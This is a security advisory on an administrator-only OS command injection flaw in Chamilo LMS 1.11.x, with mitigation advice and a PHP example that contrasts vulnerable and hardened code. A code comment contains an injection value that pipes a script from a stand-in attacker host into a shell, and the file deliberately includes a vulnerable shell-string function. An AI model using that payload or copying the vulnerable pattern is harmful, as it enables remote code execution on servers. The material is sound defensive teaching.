OS Command Injection Vulnerability

Key Information
Severity: High
CVSS Score: 7.1
Product: Chamilo LMS
Version: 1.11.x
Affected Versions: <= 1.11.28
Patched Versions: 1.11.30

Vulnerability Details
CVE-ID:
CWE: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
Description: The application passes user-supplied input to the operating system shell without proper validation or escaping, so an attacker who controls that input can execute arbitrary system commands under the account the web application runs as.
Vulnerable Component:
Vulnerable Parameter:

Exploitation Conditions
Authorized User with Administrator Role: exploitation requires an authenticated account with administrator privileges. The issue is therefore post-authentication, but it still turns administrative access to the LMS into command execution on the underlying host.

Mitigation
To prevent the execution of arbitrary commands:
Validate input against an allow-list (whitelist) of permitted characters or values before it reaches any command.
Perform the checks on the server side; client-side checks may be kept for usability, but they are trivially bypassed and must not be relied on.
Separate data from commands: pass user values as discrete arguments to the program without invoking a shell, or escape each argument for the shell, rather than concatenating them into a command string.
Review the source code for shell-execution functions that receive user-controlled input and replace potentially vulnerable or outdated methods.
Upgrade to Chamilo LMS 1.11.30 or later, where the issue is fixed.

Research
The vulnerability was discovered by Nikolay Archakov from Positive Technologies.

Vulnerability Reproduction
1. Install the plugin.
2. Set up a MySQL server on the attacker's machine.
3. Create a user on the MySQL server.
4. Inject a payload into the parameter to execute commands.

Example Payload
The payload is used to download a malicious script that provides a reverse shell to the attacker.

Conclusion
Chamilo LMS 1.11.x up to and including 1.11.28 is vulnerable to OS command injection, allowing an authenticated administrator to execute arbitrary commands on the server. Upgrading to 1.11.30 fixes the issue; at the code level the root cause is addressed by server-side input validation and by keeping user data separate from the command being executed.
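As an added illustration of the mitigation advice above, the following PHP (Chamilo's implementation language) shows a shell-string construction of the kind CWE-77 describes next to a hardened version that validates against an allow-list on the server side and passes arguments without a shell. This is example code written for this page, not code from Chamilo or from the advisory: the helper, its name, its parameters and the mysqldump invocation are assumptions made for the example, since the advisory does not name the vulnerable component or parameter.

```php
<?php
// Added example (not Chamilo code). A hypothetical helper that runs mysqldump
// against a user-supplied host; names and the command are assumptions.

// VULNERABLE: user data is interpolated straight into a shell string.
// A host value such as "127.0.0.1; curl http://attacker/x.sh | sh" is handed to
// /bin/sh, which runs the injected command. This is the CWE-77 pattern.
function exportDbVulnerable(string $host, string $user, string $db): string
{
    $cmd = "mysqldump -h $host -u $user $db";
    return (string) shell_exec($cmd);
}

// HARDENED, step 1: server-side allow-list validation.
function assertHostname(string $host): void
{
    // Hostname labels or dotted IPv4 only. Rejects ; | & $ ( ) ` spaces and a
    // leading '-', so the value can never be read as a shell operator or an option.
    $re = '/^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
        . '(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/';
    if (strlen($host) > 253 || !preg_match($re, $host)) {
        throw new InvalidArgumentException('Invalid host name');
    }
}

function assertIdentifier(string $value): void
{
    // MySQL user and database names accepted here: letters, digits, underscore.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $value)) {
        throw new InvalidArgumentException('Invalid identifier');
    }
}

// HARDENED, step 2: data and command stay separate. With PHP >= 7.4 an array
// passed to proc_open() is used directly as argv; no shell is involved, so
// shell metacharacters in any argument carry no special meaning.
function exportDbHardened(string $host, string $user, string $db): string
{
    assertHostname($host);
    assertIdentifier($user);
    assertIdentifier($db);

    $argv = ['mysqldump', '-h', $host, '-u', $user, $db];
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $descriptors, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('Could not start mysqldump');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Demonstration with a constructed malicious value: the allow-list rejects it
// before any process is started.
$evil = '127.0.0.1; id';
try {
    exportDbHardened($evil, 'backup', 'chamilo');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

If a shell string cannot be avoided, wrap each validated value in escapeshellarg() before concatenation. The allow-list remains the primary control in either case: escaping and argv passing only protect against the shell, not against the invoked program's own option parsing, which is why the hostname and identifier checks also forbid a leading hyphen.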